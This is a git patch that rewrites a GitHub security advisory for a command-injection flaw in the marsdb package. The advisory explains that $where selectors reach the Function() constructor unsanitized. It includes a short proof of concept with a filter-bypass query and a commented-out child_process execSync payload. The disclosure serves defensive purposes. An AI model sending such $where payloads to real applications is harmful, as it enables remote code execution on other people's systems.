From 274ff7be4e6335f542822d10160119ec7a7202ad Mon Sep 17 00:00:00 2001 From: Mbl4ck <33488639+msh0625@users.noreply.github.com> Date: Tue, 9 Jun 2026 10:25:04 +0900 Subject: [PATCH] Improve GHSA-5mrr-rgp6-x4gr --- .../GHSA-5mrr-rgp6-x4gr.json | 25 ++++++++++++++----- 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json b/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json index d740ffa0b9f3d..c66f5e18ce734 100644 --- a/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json +++ b/advisories/github-reviewed/2020/09/GHSA-5mrr-rgp6-x4gr/GHSA-5mrr-rgp6-x4gr.json @@ -1,12 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5mrr-rgp6-x4gr", - "modified": "2020-08-31T18:48:01Z", + "modified": "2023-01-09T05:03:48Z", "published": "2020-09-03T19:39:05Z", "aliases": [], - "summary": "Command Injection in marsdb", - "details": "All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", - "severity": [], + "summary": "[Security] Arbitrary Code Execution via unsanitized $where selector (GHSA-5mrr-rgp6-x4gr)", + "details": "The $where query selector in marsdb passes user-supplied strings directly \nto the Function() constructor without any sanitization or validation.\n\nVulnerable code in dist/DocumentMatcher.js, line 419:\n selectorValue = Function('obj', 'return ' + selectorValue);\n\nThis allows arbitrary JavaScript execution in the application context.\nOn Node.js <= 18 (typical production environments), this escalates to \nfull Remote Code Execution via require('child_process').\n\n## Proof of Concept\n\n```js\nconst Collection = require('marsdb').default;\nconst col = new Collection('users');\ncol.insert({ name: 'alice' });\n\n// Authentication bypass\ncol.find({ $where: \"1 === 1\" }).then(result => {\n console.log('Filter bypassed:', result);\n});\n\n// Full RCE on Node.js <= 18:\n// col.find({\n// $where: \"require('child_process').execSync('whoami').toString()\"\n// });\n```\n\nDiscovered using vulnscope - AI-assisted OSS vulnerability scanner\nhttps://github.com/msh0625/vulnscope", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -18,7 +23,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0.0.0" + "introduced": "0" + }, + { + "last_affected": "0.6.10" } ] } @@ -30,6 +38,10 @@ "type": "WEB", "url": "https://github.com/bkimminich/juice-shop/issues/1173" }, + { + "type": "PACKAGE", + "url": "https://github.com/c58/marsdb/blob/master/dist/DocumentMatcher.js" + }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1122" @@ -37,7 +49,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-94" ], "severity": "CRITICAL", "github_reviewed": true,